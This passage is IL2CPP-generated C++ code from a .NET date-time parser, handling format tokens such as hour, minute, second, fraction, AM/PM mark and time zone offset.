DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_115 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_115, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_02de: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_116 = ___parseInfo2; int32_t* L_117 = L_116->get_address_of_dayOfWeek_1(); int32_t L_118 = V_4; Il2CppChar L_119 = V_10; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_120 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_121 = DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988((int32_t*)L_117, L_118, L_119, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_120, /*hidden argument*/NULL); if (L_121) { goto IL_0a8e; } } { return (bool)0; } IL_02f6: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_122 = ___format1; int32_t L_123 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_122, /*hidden argument*/NULL); V_0 = L_123; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_124 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_125 = ___dtfi3; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_126 = ___result4; int32_t* L_127 = L_126->get_address_of_era_7(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_128 = DateTimeParse_MatchEraName_mF26765E6FE328C642E3F4BE8012D2B432F607E27((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_124, L_125, (int32_t*)L_127, /*hidden argument*/NULL); if (L_128) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_129 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_129, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0320: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_130 = ___parseInfo2; L_130->set_fUseHour12_3((bool)1); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_131 = ___format1; int32_t L_132 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_131, /*hidden argument*/NULL); V_0 = L_132; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_133 = ___str0; int32_t L_134 = V_0; G_B75_0 = L_133; if ((((int32_t)L_134) < ((int32_t)2))) { G_B76_0 = L_133; goto IL_0336; } } { G_B77_0 = 2; G_B77_1 = G_B75_0; goto IL_0337; } IL_0336: { G_B77_0 = 1; G_B77_1 = G_B76_0; } IL_0337: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_135 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)G_B77_1, G_B77_0, (int32_t*)(&V_5), /*hidden argument*/NULL); if (L_135) { goto IL_0350; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_136 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_136, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0350: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_137 = ___result4; int32_t* L_138 = L_137->get_address_of_Hour_3(); int32_t L_139 = V_5; Il2CppChar L_140 = V_10; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_141 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_142 = DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988((int32_t*)L_138, L_139, L_140, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_141, /*hidden argument*/NULL); if (L_142) { goto IL_0a8e; } } { return (bool)0; } IL_0369: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_143 = ___format1; int32_t L_144 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_143, /*hidden argument*/NULL); V_0 = L_144; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_145 = ___str0; int32_t L_146 = V_0; G_B82_0 = L_145; if ((((int32_t)L_146) < ((int32_t)2))) { G_B83_0 = L_145; goto IL_0378; } } { G_B84_0 = 2; G_B84_1 = G_B82_0; goto IL_0379; } IL_0378: { G_B84_0 = 1; G_B84_1 = G_B83_0; } IL_0379: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_147 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)G_B84_1, G_B84_0, (int32_t*)(&V_5), /*hidden argument*/NULL); if (L_147) { goto IL_0392; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_148 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_148, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0392: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_149 = ___result4; int32_t* L_150 = L_149->get_address_of_Hour_3(); int32_t L_151 = V_5; Il2CppChar L_152 = V_10; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_153 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_154 = DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988((int32_t*)L_150, L_151, L_152, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_153, /*hidden argument*/NULL); if (L_154) { goto IL_0a8e; } } { return (bool)0; } IL_03ab: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_155 = ___format1; int32_t L_156 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_155, /*hidden argument*/NULL); V_0 = L_156; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_157 = ___str0; int32_t L_158 = V_0; G_B89_0 = L_157; if ((((int32_t)L_158) < ((int32_t)2))) { G_B90_0 = L_157; goto IL_03ba; } } { G_B91_0 = 2; G_B91_1 = G_B89_0; goto IL_03bb; } IL_03ba: { G_B91_0 = 1; G_B91_1 = G_B90_0; } IL_03bb: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_159 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)G_B91_1, G_B91_0, (int32_t*)(&V_6), /*hidden argument*/NULL); if (L_159) { goto IL_03d4; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_160 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_160, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_03d4: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_161 = ___result4; int32_t* L_162 = L_161->get_address_of_Minute_4(); int32_t L_163 = V_6; Il2CppChar L_164 = V_10; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_165 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_166 = DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988((int32_t*)L_162, L_163, L_164, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_165, /*hidden argument*/NULL); if (L_166) { goto IL_0a8e; } } { return (bool)0; } IL_03ed: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_167 = ___format1; int32_t L_168 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_167, /*hidden argument*/NULL); V_0 = L_168; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_169 = ___str0; int32_t L_170 = V_0; G_B96_0 = L_169; if ((((int32_t)L_170) < ((int32_t)2))) { G_B97_0 = L_169; goto IL_03fc; } } { G_B98_0 = 2; G_B98_1 = G_B96_0; goto IL_03fd; } IL_03fc: { G_B98_0 = 1; G_B98_1 = G_B97_0; } IL_03fd: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_171 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)G_B98_1, G_B98_0, (int32_t*)(&V_7), /*hidden argument*/NULL); if (L_171) { goto IL_0416; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_172 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_172, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0416: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_173 = ___result4; int32_t* L_174 = L_173->get_address_of_Second_5(); int32_t L_175 = V_7; Il2CppChar L_176 = V_10; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_177 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_178 = DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988((int32_t*)L_174, L_175, L_176, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_177, /*hidden argument*/NULL); if (L_178) { goto IL_0a8e; } } { return (bool)0; } IL_042f: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_179 = ___format1; int32_t L_180 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_179, /*hidden argument*/NULL); V_0 = L_180; int32_t L_181 = V_0; if ((((int32_t)L_181) > ((int32_t)7))) { goto IL_049f; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_182 = ___str0; int32_t L_183 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_184 = DateTimeParse_ParseFractionExact_m476F7F83C40650B7BCA5511D184B1CBA207A95AB((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_182, L_183, (double*)(&V_8), /*hidden argument*/NULL); if (L_184) { goto IL_045b; } } { Il2CppChar L_185 = V_10; if ((!(((uint32_t)L_185) == ((uint32_t)((int32_t)102))))) { goto IL_045b; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_186 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_186, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_045b: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_187 = ___result4; double L_188 = L_187->get_fraction_6(); if ((!(((double)L_188) < ((double)(0.0))))) { goto IL_047b; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_189 = ___result4; double L_190 = V_8; L_189->set_fraction_6(L_190); goto IL_0a8e; } IL_047b: { double L_191 = V_8; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_192 = ___result4; double L_193 = L_192->get_fraction_6(); if ((((double)L_191) == ((double)L_193))) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_194 = ___result4; Il2CppChar L_195 = V_10; Il2CppChar L_196 = L_195; RuntimeObject * L_197 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_196); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_194, 3, _stringLiteral76821F13DAA340E4E5BA76D3FA54F27CA331CCB5, L_197, /*hidden argument*/NULL); return (bool)0; } IL_049f: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_198 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_198, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_04af: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_199 = ___format1; int32_t L_200 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_199, /*hidden argument*/NULL); V_0 = L_200; int32_t L_201 = V_0; if ((!(((uint32_t)L_201) == ((uint32_t)1)))) { goto IL_04d5; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_202 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_203 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_204 = DateTimeParse_MatchAbbreviatedTimeMark_m2839DE1FBBEA99B46C8B84199D361D30AF7294C4((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_202, L_203, (int32_t*)(&V_9), /*hidden argument*/NULL); if (L_204) { goto IL_04f0; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_205 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_205, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_04d5: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_206 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_207 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_208 = DateTimeParse_MatchTimeMark_m410D39EB9A0FFAAFD4119D320FE683170625395C((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_206, L_207, (int32_t*)(&V_9), /*hidden argument*/NULL); if (L_208) { goto IL_04f0; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_209 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_209, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_04f0: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_210 = ___parseInfo2; int32_t L_211 = L_210->get_timeMark_2(); if ((!(((uint32_t)L_211) == ((uint32_t)(-1))))) { goto IL_0506; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_212 = ___parseInfo2; int32_t L_213 = V_9; L_212->set_timeMark_2(L_213); goto IL_0a8e; } IL_0506: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_214 = ___parseInfo2; int32_t L_215 = L_214->get_timeMark_2(); int32_t L_216 = V_9; if ((((int32_t)L_215) == ((int32_t)L_216))) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_217 = ___result4; Il2CppChar L_218 = V_10; Il2CppChar L_219 = L_218; RuntimeObject * L_220 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_219); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_217, 3, _stringLiteral76821F13DAA340E4E5BA76D3FA54F27CA331CCB5, L_220, /*hidden argument*/NULL); return (bool)0; } IL_0529: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_221 = ___format1; int32_t L_222 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_221, /*hidden argument*/NULL); V_0 = L_222; TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_14), (((int64_t)((int64_t)0))), /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_223 = ___str0; int32_t L_224 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_225 = DateTimeParse_ParseTimeZoneOffset_mA4E0AC9488ACC70C3CD71335F183CE5F9CB86D28((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_223, L_224, (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_14), /*hidden argument*/NULL); if (L_225) { goto IL_0554; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_226 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_226, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0554: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_227 = ___result4; int32_t L_228 = L_227->get_flags_8(); if (!((int32_t)((int32_t)L_228&(int32_t)((int32_t)256)))) { goto IL_0589; } } { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_229 = V_14; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_230 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_231 = L_230->get_timeZoneOffset_9(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); bool L_232 = TimeSpan_op_Inequality_mEAE207F8B9A9B42CC33F4DE882E69E98C09065FC(L_229, L_231, /*hidden argument*/NULL); if (!L_232) { goto IL_0589; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_233 = ___result4; Il2CppChar L_234 = ((Il2CppChar)((int32_t)122)); RuntimeObject * L_235 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_234); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_233, 3, _stringLiteral76821F13DAA340E4E5BA76D3FA54F27CA331CCB5, L_235, /*hidden argument*/NULL); return (bool)0; } IL_0589: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_236 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_237 = V_14; L_236->set_timeZoneOffset_9(L_237); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_238 = ___result4; int32_t* L_239 = L_238->get_address_of_flags_8(); int32_t* L_240 = L_239; int32_t L_241 = *((int32_t*)L_240); *((int32_t*)L_240) = (int32_t)((int32_t)((int32_t)L_241|(int32_t)((int32_t)256))); goto IL_0a8e; } IL_05a7: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_242 = ___result4; int32_t L_243 = L_242->get_flags_8(); if (!((int32_t)((int32_t)L_243&(int32_t)((int32_t)256)))) { goto IL_05df; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_244 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_245 = L_244->get_timeZoneOffset_9(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_246 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); bool L_247 = TimeSpan_op_Inequality_mEAE207F8B9A9B42CC33F4DE882E69E98C09065FC(L_245, L_246, /*hidden argument*/NULL); if (!L_247) { goto IL_05df; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_248 = ___result4; Il2CppChar L_249 = ((Il2CppChar)((int32_t)90)); RuntimeObject * L_250 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_249); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_248, 3, _stringLiteral76821F13DAA340E4E5BA76D3FA54F27CA331CCB5, L_250, /*hidden argument*/NULL); return (bool)0; } IL_05df: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_251 = ___result4; int32_t* L_252 = L_251->get_address_of_flags_8(); int32_t* L_253 = L_252; int32_t L_254 = *((int32_t*)L_253); *((int32_t*)L_253) = (int32_t)((int32_t)((int32_t)L_254|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_255 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_256; memset(&L_256, 0, sizeof(L_256)); TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5((&L_256), (((int64_t)((int64_t)0))), /*hidden argument*/NULL); L_255->set_timeZoneOffset_9(L_256); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_257 = ___result4; int32_t* L_258 = L_257->get_address_of_flags_8(); int32_t* L_259 = L_258; int32_t L_260 = *((int32_t*)L_259); *((int32_t*)L_259) = (int32_t)((int32_t)((int32_t)L_260|(int32_t)((int32_t)512))); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_261 = ___str0; int32_t* L_262 = L_261->get_address_of_Index_1(); int32_t* L_263 = L_262; int32_t L_264 = *((int32_t*)L_263); *((int32_t*)L_263) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_264, (int32_t)1)); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_265 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_266 = DateTimeParse_GetTimeZoneName_m97D930C9A69DF1FF85F761CEBB5025A04360FEAD((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_265, /*hidden argument*/NULL); if (L_266) { goto IL_0630; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_267 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_267, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0630: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_268 = ___str0; int32_t* L_269 = L_268->get_address_of_Index_1(); int32_t* L_270 = L_269; int32_t L_271 = *((int32_t*)L_270); *((int32_t*)L_270) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_271, (int32_t)1)); goto IL_0a8e; } IL_0640: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_272 = ___str0; bool L_273 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_272, ((int32_t)90), /*hidden argument*/NULL); if (!L_273) { goto IL_06b5; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_274 = ___result4; int32_t L_275 = L_274->get_flags_8(); if (!((int32_t)((int32_t)L_275&(int32_t)((int32_t)256)))) { goto IL_0682; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_276 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_277 = L_276->get_timeZoneOffset_9(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_278 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); bool L_279 = TimeSpan_op_Inequality_mEAE207F8B9A9B42CC33F4DE882E69E98C09065FC(L_277, L_278, /*hidden argument*/NULL); if (!L_279) { goto IL_0682; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_280 = ___result4; Il2CppChar L_281 = ((Il2CppChar)((int32_t)75)); RuntimeObject * L_282 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_281); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_280, 3, _stringLiteral76821F13DAA340E4E5BA76D3FA54F27CA331CCB5, L_282, /*hidden argument*/NULL); return (bool)0; } IL_0682: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_283 = ___result4; int32_t* L_284 = L_283->get_address_of_flags_8(); int32_t* L_285 = L_284; int32_t L_286 = *((int32_t*)L_285); *((int32_t*)L_285) = (int32_t)((int32_t)((int32_t)L_286|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_287 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_288; memset(&L_288, 